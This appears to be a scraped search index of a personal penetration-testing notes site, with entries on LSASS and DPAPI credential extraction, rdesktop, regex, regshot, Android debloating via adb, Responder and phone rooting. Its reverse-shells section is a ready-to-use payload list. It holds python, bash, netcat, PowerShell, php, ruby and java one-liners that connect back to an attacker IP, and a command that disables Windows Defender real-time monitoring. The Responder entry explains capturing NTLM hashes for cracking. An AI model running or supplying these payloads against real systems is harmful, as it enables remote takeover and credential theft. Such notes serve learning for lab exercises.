                        • WDIGEST is an older authentication protocol enabled by default in Windows XP - Windows 8 and Windows Server 2003 - Windows Server 2012. LSASS caches credentials used by WDIGEST in clear-text.
                        • Kerberos is a network authentication protocol used by Active Directory in Windows Domain environments. Domain user accounts are granted tickets upon authentication with Active Directory. LSASS caches passwords, ekeys, tickets, and pins associated with Kerberos. It is possible to extract these from LSASS process memory and use them to access other systems joined to the same domain.
                        • DPAPI: The Data Protection Application Programming Interface or DPAPI is a set of APIs in Windows operating systems used to encrypt and decrypt DPAPI data blobs on a per-user basis for Windows OS features and various third-party applications. Here are just a few examples of applications that use DPAPI and what they use it for:
                        Applications Use of DPAPI Internet Explorer Password form auto-completion data (username and password for saved sites). Google Chrome Password form auto-completion data (username and password for saved sites). Outlook Passwords for email accounts. Remote Desktop Connection Saved credentials for connections to remote machines. Credential Manager Saved credentials for accessing shared resources, joining Wireless networks, VPNs and more.

                        Mimikatz and Pypykatz can extract the DPAPI masterkey for the logged-on user whose data is present in LSASS process memory. This masterkey can then be used to decrypt the secrets associated with each of the applications using DPAPI and result in the capturing of credentials for various accounts.

                        ","tags":["windows","dump hashes","passwords"]},{"location":"rdesktop/","title":"rdesktop","text":"

                        rdesktop is an open source UNIX client for connecting to Windows Remote Desktop Services, capable of natively speaking Remote Desktop Protocol (RDP) in order to present the user's Windows desktop.

                        ","tags":["tools","windows","rdp"]},{"location":"rdesktop/#installation","title":"Installation","text":"

                        Preinstalled in Kali.

                        sudo apt-get install rdesktop\n
                        ","tags":["tools","windows","rdp"]},{"location":"rdesktop/#basic-usage","title":"Basic usage","text":"
                        rdesktop $ip\n\n# Mounting a Linux Folder Using rdesktop\nrdesktop $ip -d <domain> -u <username> -p <'Password0@'> -r disk:linux='/home/user/rdesktop/files'\n
                        ","tags":["tools","windows","rdp"]},{"location":"regex/","title":"Mastering Regular Expressions - Regex","text":"

                        The implementation system of regex functionality is often called \"regular expression engine\". Basically a regex engine tries to match the pattern to the given string. There are two main types of regex engines: DFA and NFA, also referred to as text-directed and regex-directed engines.

                        h you can build complex patterns that can match a wide range of combinations.

                        Metacharacter Description . Any single character ^ Match the beginning of a line $ Match the end of a line a|b Match either a or b \\d any digit \\D Any non-digit character \\w Any word character \\W Any non-word character \\s matches any whitespace character \\S Match any non-whitespace character \\b Matches a word boundary \\B Match must not occur on a\u00a0\\b\u00a0boundary. [\\b] Backspace character \\xYY Match hex character YY \\ddd Octal character ddd [] Start/close a charaters class () Start/close a characters group \\ Escape special characters | It means OR {} Start/close repetitions of a characters class

                        Quantifiers

                        Regex Quantifier Description + + indicates that the previous character must occur at least one or more times. ? ? indicates that the preceding character is optional. It means the preceding character can occur zero or one time. * Matches zero or more of the preceding character. {n} Matches exactly n occurrences of the preceding character. {n,} Matches n or more occurrences of the preceding character. {n,m} Matches between n and m occurrences of the preceding element

                        The followings are common examples of character classes:

                        • [abc] - matches any one character that is either 'a', 'b', or 'c'.
                        • [a-z] - matches any one lowercase letter from 'a' to 'z'.
                        • [A-Z] - matches any one upper case letter from 'A' to 'Z'.
                        • [0-9] - matches any one digit from '0' to '9'. Optionaly, use \\d metacharacter.
                        • [^abc] - matches any one character that is not 'a', 'b', or 'c'.
                        • [\\w] - matches any one-word character, including letters, digits, and underscore.
                        • [\\s] - matches any whitespace character, including space, tab, and newline.
                        • [^a-z] - matches any one character that is not a lowercase letter from 'a' to 'z'.

                        In regex, any subpattern enclosed within the parentheses () is considered a group. For example,\u00a0(xyz)\u00a0creates a group that matches the exact sequence \"xyz\".

                        Non-printing character Description \\0 NULL Byte. In many programming language marks the end of a string \\b Within a character class represent the backspace character, while outside \\b matches a word boundary \\t Tab key. \\n New line \\v Vertical tabulation \\f Form feed \\r In HTTP the \\r\\n sequence is used as the end-of-line marker \\e Escape character"},{"location":"regex/#unicode","title":"Unicode","text":"

                        Regular expression flavors that work with Unicode use specific meta-sequences to match code points:

                        # `\\u`+code-point \n\ncode-point is the hexadecimal number of the character to match \n`\\u2603`\n\n# `\\x`{code-point} in the PCRE library in Apache and PHP\n{code-point} is the hexadecimal number of the character to match \n`\\x{2603}`\n
                        "},{"location":"regshot/","title":"regshot","text":"

                        regshot helps you to identify changes in Registry made by a Thick client application. It's used to compare the amount of registry entries that have been changed during an installation or a change in your system settings.

                        "},{"location":"regshot/#installation","title":"Installation","text":"

                        Download from: https://sourceforge.net/projects/regshot/

                        "},{"location":"regshot/#usage","title":"Usage","text":"

                        From the course Pentesting thick clients applications.

                        1. Run regshot version according to your thick-app (84 or 64 v).

                        2. Click on \"First shot\". It will make a \"shot\" of the existing registry entries.

                        3. Open the app you want to test and login into it.

                        4. Perform some kind of action, like for instance, viewing the profile.

                        5. Take a \"Second shot\" of the Registry entries.

                        6. After that, you will see the button \"Compare\" enabled. Click on it.

                        An HTML file will be generated and you will see the registry entries:

                        An interesting registry is \"isLoggedIn\", that has change from false to true. This may be a potential vector of attack (we could set it to true and also change username to admin).

                        HKU\\S-1-5-21-1067632574-3426529128-2637205584-1000\\dvta\\isLoggedIn: \"false\"  \nHKU\\S-1-5-21-1067632574-3426529128-2637205584-1000\\dvta\\isLoggedIn: \"true\"\n

                        "},{"location":"remove-bloatware/","title":"Remove bloatware from android phones","text":"

                        Android Debug Bridge - adb cheat sheet.

                        First of all, make sure you have enabled Developer mode in your mobile. Afterward, enable \"USB Debug mode\" (Depuraci\u00f3n USB in spanish).

                        1. Connect mobile to computer with USB cable.

                        2. Press \"File Transfer\" in mobile.

                        3. In laptop, open a terminal and run:

                        # Check if device is connected. \nadb devices\n

                        4. If device is well connected, mobile will be prompted to accept the computer connection.

                        5. Access the device from terminal:

                        adb shell\n

                        Now you can uninstall packages.

                        "},{"location":"remove-bloatware/#basic-commands","title":"Basic commands","text":"
                        # Uninstall app\npm uninstall --user 0 app.package.name\n\n# Deactivate app\npm disable-user app.package.name\n
                        "},{"location":"remove-bloatware/#list-of-xiaomi-trash","title":"List of xiaomi trash","text":"
                        • com.miui.analytics: analytic de anal\u00edtica de Xiaomi.
                        • com.xiaomi.mipicks: apps store. Occasionaly it displays adds.
                        • com.miui.msa.global: servicio de anuncios y publicidad de MIUI.
                        • com.miui.cloudservice | com.miui.cloudservice.sysbase | com.miui.newmidrive: herramientas de Mi Cloud.
                        • com.miui.cloudbackup: herramienta de copia de seguridad en la nube Mi Cloud Backup.
                        • com.miui.backup: herramienta de copias de seguridad de MIUI.
                        • com.xiaomi.glgm: herramienta de juegos de Xiaomi.
                        • comn.xiaomi.payment | com.mipay.wallet.in:\u00a0herramientas de pagos m\u00f3viles de Xiaomi.
                        • com.tencent.soter.soterserver: funci\u00f3n de pagos m\u00f3viles a trav\u00e9s de WeChat y otros servicios populares en China.
                        • cn.wps.xiaomi.abroad.lite: Mi DocViewer, herramienta de visualizaci\u00f3n de documentos PDF.
                        • com.miui.videoplayer: reproductor Mi Video.
                        • com.miui.player: reproductor Mi Music.
                        • com.mi.globalbrowser: navegador Mi Browser.
                        • com.mi.midrop: herramienta ShareMe para compartir archivos con otros dispositivos Xiaomi.
                        • com.miui.yellowpage: Mi YellowPages, sistema de protecci\u00f3n anti-spam telef\u00f3nico.
                        • com.miui.android.fashiongallery: carrusel de fondos de pantalla.
                        • com.miui.bugreport | com.miui.miservice: herramientas para reportar fallos de MIUI.
                        • com.miui.weathe2: app del tiempo de Xiaomi.
                        • com.xiaomi.joyose: herramientas de anal\u00edtica y publicidad.
                        • com.zhiliaoapp.musically: TikTok
                        • com.facebook.katana: app de Facebook.
                        • com.facebook.services: servicios de Facebook.
                        • com.facebook.system:\u00a0instalador de apps de Facebook.
                        • com.facebook.appmanager: gestor de aplicaciones de Facebook.
                        • com.ebay.mobile | com.ebay.carrier: app de eBay
                        • com.alibaba.aliexpresshd: app de AliExpress.

                        More suggestion to remove bloatware from this repo: xiaomi_debloat.sh

                        pm uninstall --user 0 com.android.inputmethod.latin\npm uninstall --user 0 com.android.camera2\npm uninstall --user 0 com.android.providers.partnerbookmarks\npm uninstall --user 0 com.android.emergency\npm uninstall --user 0 com.android.printspooler\npm uninstall --user 0 com.android.apps.tag\npm uninstall --user 0 com.android.dreams.basic\npm uninstall --user 0 com.android.dreams.phototable\npm uninstall --user 0 com.android.magicsmoke\npm uninstall --user 0 com.android.managedprovisioning\npm uninstall --user 0 com.android.noisefield\npm uninstall --user 0 com.android.phasebeam\npm uninstall --user 0 com.android.wallpaper.holospiral\npm uninstall --user 0 com.android.stk\npm uninstall --user 0 com.android.bluetoothmidiservice\npm uninstall --user 0 com.android.browser\npm uninstall --user 0 com.android.cellbroadcastreciever\npm uninstall --user 0 com.android.hotwordenrollment.okgoogle\npm uninstall --user 0 com.android.printservice.recommendation\npm uninstall --user 0 com.android.quicksearchbox\npm uninstall --user 0 com.android.email\npm uninstall --user 0 com.android.bips\npm uninstall --user 0 com.android.hotwordenrollment.xgoogle\npm uninstall --user 0 com.android.chrome\npm uninstall --user 0 com.android.webview\npm uninstall --user 0 com.android.calendar\npm uninstall --user 0 com.android.providers.calendar\npm uninstall --user 0 android.romstats\npm uninstall --user 0 com.android.documentsui\npm uninstall --user 0 com.android.globalFileexplorer\npm uninstall --user 0 com.android.midrive\npm uninstall --user 0 com.android.calculator2\npm uninstall --user 0 com.android.soundrecorder\npm uninstall --user 0 com.android.musicfx\npm uninstall --user 0 com.android.bookmarkprovider\npm uninstall --user 0 com.android.gallery3d\npm uninstall --user 0 com.android.calllogbackup\npm uninstall --user 0 com.android.traceur\npm uninstall --user 0 com.sec.android.AutoPreconfig\npm uninstall --user 0 com.sec.android.service.health\n\n\n# Google apps:\npm uninstall --user 0 com.google.android.tts\npm uninstall --user 0 com.google.android.apps.googleassistant\npm uninstall --user 0 com.google.android.apps.setupwizard.searchselector\npm uninstall --user 0 com.google.android.pixel.setupwizard\npm uninstall --user 0 com.google.android.gm\npm uninstall --user 0 com.google.android.calendar\npm uninstall --user 0 com.google.android.calculator\npm uninstall --user 0 com.google.android.apps.recorder\npm uninstall --user 0 com.google.android.printservice.recommendation\npm uninstall --user 0 com.google.android.apps.books\npm uninstall --user 0 com.google.android.apps.cloudprint\npm uninstall --user 0 com.google.android.apps.currents\npm uninstall --user 0 com.google.android.apps.fitness\npm uninstall --user 0 com.google.android.apps.photos\npm uninstall --user 0 com.google.android.apps.plus\npm uninstall --user 0 com.google.android.apps.tachyon\npm uninstall --user 0 com.google.android.music\npm uninstall --user 0 com.google.android.apps.wellbeing\npm uninstall --user 0 com.google.android.email\npm uninstall --user 0 com.google.android.googlequicksearchbox\npm uninstall --user 0 com.google.android.talk\npm uninstall --user 0 com.google.android.syncadapters.contacts\npm uninstall --user 0 com.google.android.videos\npm uninstall --user 0 com.google.tango.measure\npm uninstall --user 0 com.google.android.youtube\npm uninstall --user 0 com.google.android.apps.docs\npm uninstall --user 0 com.google.ar.lens\npm uninstall --user 0 com.google.android.apps.restore\npm uninstall --user 0 com.google.android.soundpicker\npm uninstall --user 0 com.google.android.syncadapters.calendar\npm uninstall --user 0 com.google.ar.core\npm uninstall --user 0 com.google.android.setupwizard\npm uninstall --user 0 com.google.android.apps.wallpaper\npm uninstall --user 0 com.google.android.projection.gearhead\npm uninstall --user 0 com.google.android.marvin.talkback\npm uninstall --user 0 com.google.android.inputmethod.latin\n\n\n#Xiaomi/MIUI/Baidu stuff:\n\npm uninstall --user 0 com.mi.health\npm uninstall --user 0 com.miui.zman\npm uninstall --user 0 com.miui.freeform\npm uninstall --user 0 com.miui.miwallpaper.earth\npm uninstall --user 0 com.miui.miwallpaper.mars\npm uninstall --user 0 com.miui.newmidrive\npm uninstall --user 0 cn.wps.xiaomi.abroad.lite\npm uninstall --user 0 com.miui.miservice\npm uninstall --user 0 com.xiaomi.mi_connect_service\npm uninstall --user 0 com.xiaomi.miplay_client\npm uninstall --user 0 com.miui.mishare.connectivity\npm uninstall --user 0 com.miui.huanji\npm uninstall --user 0 com.miui.misound\npm uninstall --user 0 com.xiaomi.mirecycle\npm uninstall --user 0 com.miui.cloudbackup\npm uninstall --user 0 com.miui.backup\npm uninstall --user 0 com.mfashiongallery.emag\npm uninstall --user 0 com.miui.accessibility\npm uninstall --user 0 com.xiaomi.account\npm uninstall --user 0 com.xiaomi.xmsf\npm uninstall --user 0 com.xiaomi.simactivate.service\npm uninstall --user 0 com.miui.daemon\npm uninstall --user 0 com.miui.cloudservice.sysbase\npm uninstall --user 0 com.mi.webkit.core\npm uninstall --user 0 com.sohu.inputmethod.sogou.xiaomi\npm uninstall --user 0 com.miui.notes\npm uninstall --user 0 com.bsp.catchlog\npm uninstall --user 0 com.miui.vsimcore\npm uninstall --user 0 com.xiaomi.scanner\npm uninstall --user 0 com.miui.greenguard\npm uninstall --user 0 com.miui.android.fashiongallery\npm uninstall --user 0 com.miui.cloudservice\npm uninstall --user 0 com.miui.micloudsync\npm uninstall --user 0 com.miui.enbbs\npm uninstall --user 0 com.mi.android.globalpersonalassistant\npm uninstall --user 0 com.mi.globalTrendNews\npm uninstall --user 0 com.milink.service\npm uninstall --user 0 com.mipay.wallet.id\npm uninstall --user 0 com.mipay.wallet.in\npm uninstall --user 0 com.miui.analytics\npm uninstall --user 0 com.miui.bugreport\npm uninstall --user 0 com.miui.cleanmaster\npm uninstall --user 0 com.miui.hybrid.accessory\npm uninstall --user 0 com.miui.miwallpaper\npm uninstall --user 0 com.miui.msa.global\npm uninstall --user 0 com.miui.touchassistant\npm uninstall --user 0 com.miui.translation.kingsoft\npm uninstall --user 0 com.miui.translation.xmcloud\npm uninstall --user 0 com.miui.translation.youdao\npm uninstall --user 0 com.miui.translationservice\npm uninstall --user 0 com.miui.userguide\npm uninstall --user 0 com.miui.virtualsim\npm uninstall --user 0 com.miui.yellowpage\npm uninstall --user 0 com.miui.videoplayer\npm uninstall --user 0 com.miui.weather2\npm uninstall --user 0 com.miui.player\npm uninstall --user 0 com.miui.screenrecorder\npm uninstall --user 0 com.miui.providers.weather\npm uninstall --user 0 com.miui.compass\npm uninstall --user 0 com.miui.calculator\npm uninstall --user 0 com.xiaomi.vipaccount\npm uninstall --user 0 com.xiaomi.channel\npm uninstall --user 0 com.mipay.wallet\npm uninstall --user 0 com.xiaomi.pass\npm uninstall --user 0 com.xiaomi.shop\npm uninstall --user 0 com.xiaomi.joyose\npm uninstall --user 0 com.xiaomi.providers.appindex\npm uninstall --user 0 com.miui.fm\npm uninstall --user 0 com.mi.liveassistant\npm uninstall --user 0 com.xiaomi.gamecenter.sdk.service\npm uninstall --user 0 com.xiaomi.payment\npm uninstall --user 0 com.baidu.input_mi\npm uninstall --user 0 com.xiaomi.ab\npm uninstall --user 0 com.xiaomi.jr\npm uninstall --user 0 com.baidu.duersdk.opensdk\npm uninstall --user 0 com.miui.hybrid\npm uninstall --user 0 com.baidu.searchbox\npm uninstall --user 0 com.xiaomi.glgm\npm uninstall --user 0 com.xiaomi.midrop\npm uninstall --user 0 com.xiaomi.mipicks\npm uninstall --user 0 com.miui.personalassistant\npm uninstall --user 0 com.miui.audioeffect\npm uninstall --user 0 com.miui.cit\npm uninstall --user 0 com.miui.qr\npm uninstall --user 0 com.miui.nextpay\npm uninstall --user 0 com.xiaomi.o2o\n\n\n#Xiaomi.eu:\npm uninstall --user 0 pl.zdunex25.updater\n\n\n#RevolutionOS: (not well tested)\npm uninstall --user 0 ros.ota.updater\n\n#SyberiaOS: (not well tested)\npm uninstall --user 0 com.syberia.ota\npm uninstall --user 0 com.syberia.SyberiaPapers\n\n\n#LineageOS: (not well tested)\npm uninstall --user 0 org.lineageos.recorder\npm uninstall --user 0 org.lineageos.snap\n\n\n#Paranoid Android:\npm uninstall --user 0 com.hampusolsson.abstruct\npm uninstall --user 0 code.name.monkey.retromusic\n\n#Other stuff:\npm uninstall --user 0 com.autonavi.minimap\npm uninstall --user 0 com.caf.fmradio\npm uninstall --user 0 com.opera.preinstall\npm uninstall --user 0 com.qualcomm.qti.perfdump\npm uninstall --user 0 com.duokan.phone.remotecontroller\npm uninstall --user 0 com.samsung.aasaservice\npm uninstall --user 0 org.simalliance.openmobileapi.service\npm uninstall --user 0 com.duokan.phone.remotecontroller.peel.plugin\npm uninstall --user 0 com.facemoji.lite.xiaomi\npm uninstall --user 0 com.facebook.appmanager\npm uninstall --user 0 com.facebook.katana\npm uninstall --user 0 com.facebook.services\npm uninstall --user 0 com.facebook.system\npm uninstall --user 0 com.netflix.partner.activation\n\n\n# !EXPERIMENTAL STUFF!\n\n\n#GPS & Location debloat\n#Uninstalling these may break apps like Waze.\n#You have been warned.\npm uninstall --user 0 com.android.location.fused\npm uninstall --user 0 org.codeaurora.gps.gpslogsave\npm uninstall --user 0 com.google.android.gms.location.history\npm uninstall --user 0 com.qualcomm.location\npm uninstall --user 0 com.xiaomi.bsp.gps.nps\npm uninstall --user 0 com.xiaomi.location.fused\n\n\n#Use this if you don't like the stock MIUI launcher.\n#Uninstalling this without basic setup and an alternative launcher will make the device unstable or softbricked.\n#You can't downgrade to a lower version of MIUI launcher after uninstalling this.\n#You have been warned.\npm uninstall --user 0 com.miui.home\n\n\n#Always-on Display removal\n#Not recommended, and not well-tested in daily usage\n#You have been warned.\npm uninstall --user 0 com.miui.aod\n
                        "},{"location":"responder/","title":"Responder.py - A SMB server to listen to NTLM hashes","text":"

                        Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

                        Responder can do many different kinds of attacks. For instance we may set up a malicious SMB server. When the target machine attempts to perform the NTLM authentication to that server, Responder sends a challenge back for the server to encrypt with the user's password. When the server responds, Responder will use the challenge and the encrypted response to generate the NetNTLMv2. While we can't reverse the NetNTLMv2, we can try many different common passwords to see if any generate the same challenge-response, and if we find one, we know that is the password. We can use John The Ripper.

                        ","tags":["tools","cheat sheet","python","windows","active directory","ldap","server"]},{"location":"responder/#installation","title":"Installation","text":"
                        git clone https://github.com/lgandx/Responder.git\ncd Responder \nsudo pip install -r requirements.txt\n
                        ","tags":["tools","cheat sheet","python","windows","active directory","ldap","server"]},{"location":"responder/#basic-usage","title":"Basic usage","text":"
                        ./Responder.py -I [interface] -w -d\n# -I: Set interface \n# -w: Start the WPAD rogue proxy server. Default value is False\n# -d: Enable answers for DHCP broadcast requests. This option will inject a WPAD server in the DHCP response. Default: False\n\n# In the HTB machine responder:\n./Responder.py -I tun0 -w -d\n

                        All saved Hashes are located in Responder's logs directory (/usr/share/responder/logs/). We can copy the hash to a file and attempt to crack it using the hashcat module 5600.

                        Note:\u00a0If you notice multiples hashes for one account this is because NTLMv2 utilizes both a client-side and server-side challenge that is randomized for each interaction. This makes it so the resulting hashes that are sent are salted with a randomized string of numbers. This is why the hashes don't match but still represent the same password.

                        ","tags":["tools","cheat sheet","python","windows","active directory","ldap","server"]},{"location":"responder/#practical-example","title":"Practical example","text":"

                        HackTheBox machine: Responder.

                        ","tags":["tools","cheat sheet","python","windows","active directory","ldap","server"]},{"location":"reverse-shells/","title":"Reverse shells","text":"Resources to generate reverse shells
                        • https://www.revshells.com/
                        • Netcat for windows 32/64 bit
                        • Pentesmonkey
                        • PayloadsAllTheThings
                        All about shells Shell Type Description Reverse shell Initiates a connection back to a \"listener\" on our attack box. Bind shell \"Binds\" to a specific port on the target host and waits for a connection from our attack box. Web shell Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a\u00a0PHP\u00a0script to run a single command.

                        Victim's machine Initiates a connection back to a \"listener\" on our attacking machine box.

                        For this attack to work, first we set the listener in the attacking machine using netcat.

                        nc -lnvp 1234\n

                        After that, on the victim's machine, you can launch the reverse shell connection.

                        A Reverse Shell is handy when we want to get a quick, reliable connection to our compromised host. However, a Reverse Shell can be very fragile. Once the reverse shell command is stopped, or if we lose our connection for any reason, we would have to use the initial exploit to execute the reverse shell command again to regain our access.

                        ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#reverse-shell-connections","title":"Reverse shell connections","text":"","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#python","title":"python","text":"
                        python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n
                        ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#bash","title":"bash","text":"
                        bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'\n
                        rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f\n\n# rm /tmp/f;\n# Removes the /tmp/f file if it exists, -f causes rm to ignore nonexistent files. The semi-colon (;) is used to execute the command sequentially.\n\n# mkfifo /tmp/f;\n# Makes a FIFO named pipe file at the location specified. In this case, /tmp/f is the FIFO named pipe file, the semi-colon (;) is used to execute the command sequentially.\n\n# cat /tmp/f |\n# Concatenates the FIFO named pipe file /tmp/f, the pipe (|) connects the standard output of cat /tmp/f to the standard input of the command that comes after the pipe (|).\n\n# /bin/sh -i 2>&1 |\n# Specifies the command language interpreter using the -i option to ensure the shell is interactive. 2>&1 ensures the standard error data stream (2) & standard output data stream (1) are redirected to the command following the pipe (|).\n\n# nc $ip <port> >/tmp/f\n# Uses Netcat to send a connection to our attack host $ip listening on port <port>. The output will be redirected (>) to /tmp/f, serving the Bash shell to our waiting Netcat listener when the reverse shell one-liner command is executed\n
                        ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#powershell","title":"powershell","text":"
                        powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"\n\n# same, but without assigning $client to the new object\npowershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"10.10.10.10\",1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\n\n# powershell -nop -c \n# Executes powershell.exe with no profile (nop) and executes the command/script block (-c or -Command) contained in the quotes\n\n# \"$client = New-Object System.Net.Sockets.TCPClient(10.10.14.158,433);\n# Sets/evaluates the variable $client equal to (=) the New-Object cmdlet, which creates an instance of the System.Net.Sockets.TCPClient .NET framework object. The .NET framework object will connect with the TCP socket listed in the parentheses (10.10.14.158,443). The semi-colon (;) ensures the commands & code are executed sequentially.\n\n# $stream = $client.GetStream();\n# Sets/evaluates the variable $stream equal to (=) the $client variable and the .NET framework method called GetStream that facilitates network communications. \n\n# [byte[]]$bytes = 0..65535|%{0}; \n# Creates a byte type array ([]) called $bytes that returns 65,535 zeros as the values in the array. This is essentially an empty byte stream that will be directed to the TCP listener on an attack box awaiting a connection.\n\n# while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)\n\n# Starts a while loop containing the $i variable set equal to (=) the .NET framework Stream.Read ($stream.Read) method. The parameters: buffer ($bytes), offset (0), and count ($bytes.Length) are defined inside the parentheses of the method.\n\n\n# {;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);\n# Sets/evaluates the variable $data equal to (=) an ASCII encoding .NET framework class that will be used in conjunction with the GetString method to encode the byte stream ($bytes) into ASCII. In short, what we type won't just be transmitted and received as empty bits but will be encoded as ASCII text. \n\n# $sendback = (iex $data 2>&1 | Out-String ); \n# Sets/evaluates the variable $sendback equal to (=) the Invoke-Expression (iex) cmdlet against the $data variable, then redirects the standard error (2>) & standard input (1) through a pipe (|) to the Out-String cmdlet which converts input objects into strings. Because Invoke-Expression is used, everything stored in $data will be run on the local computer. \n\n# $sendback2 = $sendback + 'PS ' + (pwd).path + '> '; \n# Sets/evaluates the variable $sendback2 equal to (=) the $sendback variable plus (+) the string PS ('PS') plus + path to the working directory ((pwd).path) plus (+) the string '> '. This will result in the shell prompt being PS C:\\workingdirectoryofmachine >. \n\n# $sendbyte=  ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}\n# Sets/evaluates the variable $sendbyte equal to (=) the ASCII encoded byte stream that will use a TCP client to initiate a PowerShell session with a Netcat listener running on the attack box.\n
                         Set-MpPreference -DisableRealtimeMonitoring $true\n
                        ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#php","title":"php","text":"
                        php -r '$sock=fsockopen(\"10.0.0.1\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");'\n
                        ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#netcat","title":"netcat","text":"
                        nc -e /bin/sh 10.0.0.1 1234\n\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f\n
                        ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#ruby","title":"ruby","text":"
                        ruby -rsocket -e'f=TCPSocket.open(\"10.0.0.1\",1234).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'\n
                        ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#java","title":"java","text":"
                        r = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \\$line 2>&5 >&5; done\"] as String[])\np.waitFor()\n
                        ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#xterm","title":"xterm","text":"
                        xterm -display 10.0.0.1:1\n
                        ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"rooting-mobile/","title":"Rooting mobile","text":""},{"location":"rooting-mobile/#samsung-galaxy-a515f","title":"Samsung Galaxy A515F","text":""},{"location":"rooting-mobile/#install-a-windows-10-vm-in-your-phisical-kali-machine","title":"Install a Windows 10 VM in your phisical kali machine","text":"
                        1. Install a Windows10 VM in your preferred hyper XXX technology.

                        2. Virtualize your USB in the windows machine: VirtualBox > Settings (on the desired VM) > USB > Make sure usb 3 is selected > click on + icon and select device.

                        Troubleshooting: You may find that your android phone does not appear there yet. The reason behind might be that the user responsible for the virtualbox process has no permissions to access the USB mounted devices. We will add it in our phisical machine (kali):

                        sudo usermod -a -G vboxusers $username\nnewgrp vboxusers\n\n# and reboot kali\n

                        After that, replay step 2 and we should see the device.

                        "},{"location":"rooting-mobile/#install-samsung-drivers-in-your-windows-vm","title":"Install Samsung drivers in your Windows VM","text":"

                        There is this video with assistance for this: https://www.youtube.com/watch?v=K3Jk7dCvdNM.

                        This is the download link for getting those drivers: https://developer.samsung.com/android-usb-driver.

                        And try to install Samsung Dex. I could not, but since I have the drivers installed, this was optional.

                        "},{"location":"rooting-mobile/#backup-your-mobile","title":"Backup your mobile","text":"

                        Because we are going to go to fabric resetting

                        "},{"location":"rooting-mobile/#enable-developers-mode-in-your-device","title":"Enable developers mode in your device","text":"

                        Go to Settings > About the phone > Software Information > and tap I don't know how many times on \"Build Number\" (5?). Eventually you will see a message with a countdown number to enable \"Developer mode\".

                        "},{"location":"rooting-mobile/#enable-debug-mode","title":"Enable Debug mode","text":"

                        Go to Settings > Developer options (now these are enabled) > Debug mode ---set to on

                        "},{"location":"rooting-mobile/#set-oem-unlocking-to-on","title":"Set OEM unlocking to ON","text":"

                        Go to Settings > Developer options (now these are enabled) > OEM unlocking ---set to on

                        "},{"location":"rooting-mobile/#get-into-download-mode-and-unblock-the-bootloader","title":"Get into Download mode and unblock the Bootloader","text":"

                        Turn off your android phone completely. But completely.

                        Press volume up and press volume down both at the same time and keep it press. Connect at the same time the USB-C cable to your device (and to your computer) and you will see a Warning screen. When you see it, you can stop pressing the up-down volume buttons.

                        Now, long press Volume up button and you will see this message (stop pressing when you see it):

                        The following two steps are:

                        Press volume up once, and you will see a black screen. When the screens turns into black press quickly volume up and down at the same time once. With that Bootloader will be unblocked.

                        Now we will enter in the Download mode,

                        only by pressing once on the volume up button.

                        Leave the device and go to your windows.

                        "},{"location":"rooting-mobile/#flash-the-device-from-the-windows-vm","title":"Flash the device from the windows VM","text":"

                        Firstable, you will need to make sure that you have the proper firmware file. For that open the properties of your device and see the firmware version:

                        This, alone with your mobile model, will be useful for finding the firmware.

                        Download it to your windows VM and unzip it.

                        Open Odin.

                        Make sure the device appears.

                        Go to Options tab and disable \"Auto Reboot\". In AP, select the file and have fun, the process may take a while:

                        Click on Start and wait until you see the PASS message:

                        Be careful not to disconnect the USB-C cable.

                        "},{"location":"rooting-mobile/#enter-in-recovery-mode","title":"Enter in Recovery mode","text":"

                        Go back to your Android Device and long press the 3 buttons (volume Up - Volume Down - and Power) at the same time.

